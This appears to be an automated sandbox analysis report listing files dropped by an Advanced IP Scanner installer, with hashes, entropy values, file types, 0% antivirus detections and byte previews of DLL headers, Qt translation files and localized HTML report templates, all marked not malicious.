                                                                                                                      Entropy (8bit):5.864906645133905
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
                                                                                                                      MD5:E8D9421848C1DDEA1A74EBFDBE452C67
                                                                                                                      SHA1:7F1302F2B64FF785ABF85F5A9579EA12E555233B
                                                                                                                      SHA-256:3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
                                                                                                                      SHA-512:2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21326
                                                                                                                      Entropy (8bit):5.601982778539758
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
                                                                                                                      MD5:B961B562628E357221F12EB6A212860C
                                                                                                                      SHA1:35E6905D0410CEDC12B77EA8735CEDCB74913B25
                                                                                                                      SHA-256:5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
                                                                                                                      SHA-512:8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3..*.y.....*.y.....*.%...F.*.0...q.+.......+.....*.+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&......*..5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1158
                                                                                                                      Entropy (8bit):4.820254321830803
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
                                                                                                                      MD5:82043E0E5311A889AD7709A4A735BC76
                                                                                                                      SHA1:F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
                                                                                                                      SHA-256:9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
                                                                                                                      SHA-512:E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19648
                                                                                                                      Entropy (8bit):6.961454559139268
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
                                                                                                                      MD5:39556E904FA2405ABAF27231DA8EF9E5
                                                                                                                      SHA1:89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
                                                                                                                      SHA-256:5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
                                                                                                                      SHA-512:558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):23232
                                                                                                                      Entropy (8bit):6.854338104703726
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
                                                                                                                      MD5:AE3FA6BF777B0429B825FB6B028F8A48
                                                                                                                      SHA1:B53DBFDB7C8DEAA9A05381F5AC2E596830039838
                                                                                                                      SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                                                      SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):7.018574692016083
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                                                      MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                                                      SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                                                      SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                                                      SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1162
                                                                                                                      Entropy (8bit):5.054590965912235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
                                                                                                                      MD5:AAFE73E9DD742ECBA22903D3DA498688
                                                                                                                      SHA1:AE8580EFD2267042ABB5D6EBC36A0277345BE963
                                                                                                                      SHA-256:777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
                                                                                                                      SHA-512:06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28217
                                                                                                                      Entropy (8bit):4.655652026218731
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
                                                                                                                      MD5:C8AF2228F3F331635F1E4E55E1C9FD32
                                                                                                                      SHA1:9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
                                                                                                                      SHA-256:16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
                                                                                                                      SHA-512:DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G..*.y.....*.y...Y.*.%..%..*.0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27204
                                                                                                                      Entropy (8bit):5.005345988323232
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
                                                                                                                      MD5:53839022420E21292B81995749C5BCBD
                                                                                                                      SHA1:D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
                                                                                                                      SHA-256:44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
                                                                                                                      SHA-512:6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D..*.y.....*.y.....*.%..$X.*.0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27834
                                                                                                                      Entropy (8bit):4.7072414399522335
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
                                                                                                                      MD5:A3264DCBED0CEFC981230E4CCADF8807
                                                                                                                      SHA1:0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
                                                                                                                      SHA-256:6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
                                                                                                                      SHA-512:7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P*..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..*m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7*...e..Z.......Z........6. =...Fo.*.y.....*.y...].*.%..$..*.0..$..+.....G.+.......+....x.+......+....&..G.... ..G....*..H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1142
                                                                                                                      Entropy (8bit):5.0337822285325755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoSssuSVIXqFHGqP97iV0Kt5RGDqReEhyv:HXssRVIXqFHGqP900U2Dws
                                                                                                                      MD5:34B8B376FC335077A97D5C218E01E14D
                                                                                                                      SHA1:45D32290176CF33D77EA0FE8F40D0BC3D6D6F2C8
                                                                                                                      SHA-256:3733D0B7A0B799AD19140DCB4D22C8B024E102D7C2D44AF1D6CCCAAB9920CF12
                                                                                                                      SHA-512:7A65D54FB9EE70B953A83E960337C6E4352207D82F99F041E29A57E9BEB8C80891295A39F038F8E463362506BDA375046891D1ECFEC075CD6FD5603933382FB3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>..</center></b></
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27091
                                                                                                                      Entropy (8bit):4.712868636230012
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
                                                                                                                      MD5:9D3E23BE36601D3604F9F370942DAA55
                                                                                                                      SHA1:AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
                                                                                                                      SHA-256:0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
                                                                                                                      SHA-512:3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_.*.y...&.*.y...S.*.%..#..*.0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6708264
                                                                                                                      Entropy (8bit):6.661851136227646
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
                                                                                                                      MD5:1FBE59E9BE0F445BB14BE02C0EE69D6F
                                                                                                                      SHA1:98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
                                                                                                                      SHA-256:F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
                                                                                                                      SHA-512:00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../|..B}.|/|..B}..*|..B}..B|.#G}.|/y..B}.|/x..C}.|/}..B}.|/...B}..B.B}.|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1149
                                                                                                                      Entropy (8bit):4.789609676615686
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
                                                                                                                      MD5:C81043ED485CCE96CDA08A5986F04E31
                                                                                                                      SHA1:8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
                                                                                                                      SHA-256:119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
                                                                                                                      SHA-512:56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1151
                                                                                                                      Entropy (8bit):5.068076577523285
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
                                                                                                                      MD5:1E41F2F1C303F750C96681515894C7B4
                                                                                                                      SHA1:A6B4E2EC874030D50A0156E4A6CF2EF952F11455
                                                                                                                      SHA-256:350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
                                                                                                                      SHA-512:ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):7.030340698171656
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
                                                                                                                      MD5:F6B4D8D403D22EB87A60BF6E4A3E7041
                                                                                                                      SHA1:B51A63F258B57527549D5331C405EACC77969433
                                                                                                                      SHA-256:25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
                                                                                                                      SHA-512:1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1163
                                                                                                                      Entropy (8bit):4.820312505780483
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
